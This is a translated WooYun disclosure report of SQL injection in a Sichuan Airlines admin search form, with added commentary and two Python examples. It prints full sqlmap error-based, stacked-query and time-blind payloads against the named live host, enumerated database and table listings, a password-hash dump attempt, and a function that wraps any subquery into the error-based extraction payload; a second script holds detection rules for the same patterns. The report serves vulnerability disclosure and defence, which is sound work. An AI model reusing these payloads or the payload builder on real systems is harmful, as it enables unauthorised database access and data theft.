
Vulnerability summary

Defect ID: wooyun-2015-0100147

Title: SQL injection in a Sichuan Airlines system

Vendor: Sichuan Airlines (四川航空)

Author: 路人甲

Submitted: 2015-03-08 14:04

Fix deadline: 2015-04-22 14:06

Published: 2015-04-22 14:06

Type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: handed to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-08: details sent to the vendor, awaiting the vendor's handling
2015-03-11: vendor confirmed; details visible to the vendor only
2015-03-21: details opened to core white hats and experts in the relevant field
2015-03-31: details opened to regular white hats
2015-04-10: details opened to intern white hats
2015-04-22: details opened to the public

Brief description:

A Sichuan Airlines system is vulnerable to SQL injection.

Detailed description:

The weak-password issue I submitted yesterday has not been reviewed yet, so I looked around for other bugs in the meantime.
Affected system: http://www.scal.com.cn/invite2011/admin/ (requires login)
Injection point:

(screenshot 8.png: the injection point in the admin search form)

The form has several parameters; I tested two of them, check the rest yourselves.

<code>
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Place: POST
Parameter: txtQueryMobile
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ+ehruiupOimgeWIoOmZpOaVsOaNruWQl+8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR+EXm0=&__EVENTVALIDATION=/wEWHgLbue+rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' AND 2000=CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(102)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (2000=2000) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(120)+CHAR(117)+CHAR(113))) AND '%'='&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ+ehruiupOimgeWIoOmZpOaVsOaNruWQl+8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR+EXm0=&__EVENTVALIDATION=/wEWHgLbue+rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%'; WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ+ehruiupOimgeWIoOmZpOaVsOaNruWQl+8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR+EXm0=&__EVENTVALIDATION=/wEWHgLbue+rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=
---
</code>
<code>
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [25]:
[*] Invite2011
[*] master
[*] model
[*] msdb
[*] SCAL3_B2C
[*] SCAL3_Card
[*] SCAL3_Familiar
[*] SCAL3_Hotel
[*] SCAL3_Insurance
[*] SCAL3_InsuranceNew
[*] SCAL3_Itinerary
[*] SCAL3_Log
[*] SCAL3_Mall
[*] SCAL3_Member
[*] SCAL3_Message
[*] SCAL3_MinPrice
[*] SCAL3_News
[*] SCAL3_Order
[*] SCAL3_Pay
[*] SCAL3_Preferential
[*] SCAL3_SaleRule
[*] SCAL3_SessionService
[*] SCAL3_SOA
[*] SCAL3_System
[*] tempdb
</code>
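The error-based payload works because `CONVERT(INT, '<non-numeric string>')` makes SQL Server raise an error whose text echoes the string it could not convert, and the list of 25 databases above was read through exactly that channel, one value per request. The following added example (mine, not the report's and not sqlmap's code) decodes the `CHAR()`-built marker strings in the report's payload, rebuilds the same wrapper around an arbitrary subquery, and parses a value back out of a constructed copy of the server's error text. The `+` between the `CHAR()` calls is the T-SQL concatenation operator and is assumed here, since form decoding strips it from the payload as the page shows it.

```python
import re

# The SELECT from the report's error-based payload. The '+' between CHAR() calls is the
# T-SQL string-concatenation operator, assumed here (form decoding drops it on the page).
REPORT_PAYLOAD = (
    "CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(102)+CHAR(97)+CHAR(113)"
    "+(SELECT (CASE WHEN (2000=2000) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(121)+CHAR(120)+CHAR(117)+CHAR(113)))"
)

CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*")


def decode_char_runs(sql):
    """Rewrite every CHAR(n)+CHAR(m)+... run as the quoted string it builds."""
    def to_literal(m):
        codes = re.findall(r"CHAR\((\d+)\)", m.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RUN.sub(to_literal, sql)


def markers(payload):
    """The first and last CHAR()-built strings are the prefix/suffix delimiters."""
    literals = re.findall(r"'([^']*)'", decode_char_runs(payload))
    return literals[0], literals[-1]


def encode_chars(s):
    # Build a string without quote characters, the way sqlmap does, so it survives
    # contexts where ' is filtered or would break the surrounding literal.
    return "+".join(f"CHAR({ord(c)})" for c in s)


def build_payload(subquery, prefix="qifaq", suffix="qyxuq"):
    """Wrap any scalar subquery so its value is forced through CONVERT(INT, ...)."""
    return f"CONVERT(INT,(SELECT {encode_chars(prefix)}+({subquery})+{encode_chars(suffix)}))"


def fake_mssql_error(value, prefix="qifaq", suffix="qyxuq"):
    # Constructed stand-in for the server: SQL Server answers CONVERT(INT, <non-numeric>)
    # with error 245, whose text echoes the offending string. The letters in the markers
    # guarantee the string is never numeric, so the conversion always fails and always leaks.
    return (f"Conversion failed when converting the nvarchar value "
            f"'{prefix}{value}{suffix}' to data type int.")


def extract_from_error(message, prefix, suffix):
    """What the attacker's client does with the error page: take what sits between the markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), message)
    return m.group(1) if m else None


def demo():
    prefix, suffix = markers(REPORT_PAYLOAD)
    # The report's probe: CASE WHEN 2000=2000 yields '1', so the error says 'qifaq1qyxuq'.
    probe = extract_from_error(fake_mssql_error("1"), prefix, suffix)
    # The same channel carries data, one value per request, e.g. the current database name.
    payload = build_payload("SELECT DB_NAME()")
    leaked = extract_from_error(fake_mssql_error("Invite2011"), prefix, suffix)
    return {"prefix": prefix, "suffix": suffix, "probe": probe,
            "payload": decode_char_runs(payload), "leaked": leaked}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Two practical consequences follow: an application that shows database error text to the user (a stack trace or the raw exception message on the ASP.NET yellow page) turns any injection into a one-request-per-value data channel, and a custom error page that hides the message removes this channel but not the time-based one that the report also found.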


<code>
Database: master
[291 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_values                                 |
| sys.all_columns                            |
</code>

(The master listing stops at sys.all_columns in the report; the rest of the 291 tables are not shown.)

<code>
Database: Invite2011
[11 tables]
+-----------------------+
| sqlmapoutput          |
| sysdiagrams           |
| t_Invite              |
| t_InviteEducation     |
| t_InviteEducation_bak |
| t_InviteFamily        |
| t_InviteFamily_bak    |
| t_InviteWork          |
| t_InviteWork_bak      |
| t_Invite_bak          |
| t_User                |
+-----------------------+
Database: msdb
[10 tables]
+-------------------+
| backupfile        |
| backupmediafamily |
| backupmediaset    |
| backupset         |
| logmarkhistory    |
| restorefile       |
| restorefilegroup  |
| restorehistory    |
| suspect_pages     |
| sysdac_instances  |
+-------------------+
</code>

The `sqlmapoutput` table in Invite2011 is not part of the application: sqlmap creates a table of that name on SQL Server to collect xp_cmdshell output when its takeover options (--os-cmd, --os-shell) are run over a stacked-query injection. Its presence means the stacked channel was exercised beyond a WAITFOR probe, and the table should be dropped as part of the clean-up.

Proof of vulnerability:

<code>
back-end DBMS: Microsoft SQL Server 2005
database management system users password hashes:
[*] invite [1]:
    password hash: NULL
[*] sa [1]:
    password hash: NULL
</code>

The other databases appear to belong to http://www.scal.com.cn/B2C.

(screenshot 9.png: sqlmap output for the password-hash dump)

Privilege escalation would be needed. The NULL hashes do not mean the `invite` and `sa` logins have empty passwords: on SQL Server 2005 the `password_hash` column of `sys.sql_logins` reads as NULL for any login without CONTROL SERVER permission, so the application's login is not sysadmin and the hashes stay out of reach until that changes.
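For the defender, the three payloads have distinctive shapes: `WAITFOR DELAY`, `CONVERT(INT, ...)` around a chain of `CHAR()` calls, and a `%'` that closes a LIKE literal immediately before a keyword or statement terminator. The following added detection example (not from the report; the parameter names come from the report, the request bodies are constructed and the `__VIEWSTATE` value is a placeholder) runs those rules over form-decoded POST bodies, and shows that a legitimate search containing an apostrophe does not trip them. As in the block above, the `+` between `CHAR()` calls is assumed.

```python
import re
from urllib.parse import parse_qs, urlencode

# Detection rules keyed to what the report's three payloads contain. They run on the
# form-decoded value of each POST parameter, not on the raw (percent-encoded) body.
RULES = {
    "mssql_time_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "mssql_error_convert": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "char_concat_chain": re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)\s*\+\s*){3,}CHAR\s*\(\s*\d+\s*\)", re.I),
    "quote_break_after_wildcard": re.compile(r"%'\s*(?:AND|OR|WAITFOR|;|--)", re.I),
}


def scan_body(body):
    """Return {parameter: [rule names]} for every parameter whose value trips a rule."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            matched = [rule for rule, rx in RULES.items() if rx.search(value)]
            if matched:
                hits.setdefault(name, set()).update(matched)
    return {name: sorted(rules) for name, rules in hits.items()}


def form(mobile, name="1"):
    # Constructed request body in the shape of the admin search form; the
    # __VIEWSTATE value is a placeholder, not the one from the report.
    return urlencode({
        "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": "dGVzdA==",
        "txtQueryName": name, "ddlQuerySex": "0", "txtQueryMobile": mobile,
        "ddlQueryIsEnable": "0", "btnQuery": "查询", "hfID": "",
    })


# The three txtQueryMobile values sqlmap reported, with '+' between CHAR() calls assumed.
ERROR_BASED = ("12312334567%' AND 2000=CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(102)"
               "+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (2000=2000) THEN CHAR(49) ELSE CHAR(48) END))"
               "+CHAR(113)+CHAR(121)+CHAR(120)+CHAR(117)+CHAR(113))) AND '%'='")
STACKED = "12312334567%'; WAITFOR DELAY '0:0:5'--"
TIME_BLIND = "12312334567%' WAITFOR DELAY '0:0:5'--"


def demo():
    return {
        "benign": scan_body(form("13800000001")),
        "apostrophe_in_name": scan_body(form("13800000001", name="O'Brien")),
        "error_based": scan_body(form(ERROR_BASED)),
        "stacked": scan_body(form(STACKED)),
        "time_blind": scan_body(form(TIME_BLIND)),
    }


if __name__ == "__main__":
    for case, hits in demo().items():
        print(f"{case}: {hits or 'clean'}")
```

Rules like these catch sqlmap's default templates, not a hand-written or tamper-scripted payload, so they belong in logging and alerting rather than as the only control; the fix is the parameterised query, and the detection is there to tell you the form is being probed.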

Remediation:

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: High

Rank: 11

Confirmed: 2015-03-11 11:32

Vendor reply:

CNVD has confirmed the reported situation and has notified the website's operating unit through the handling channel established earlier.

Latest status:

None yet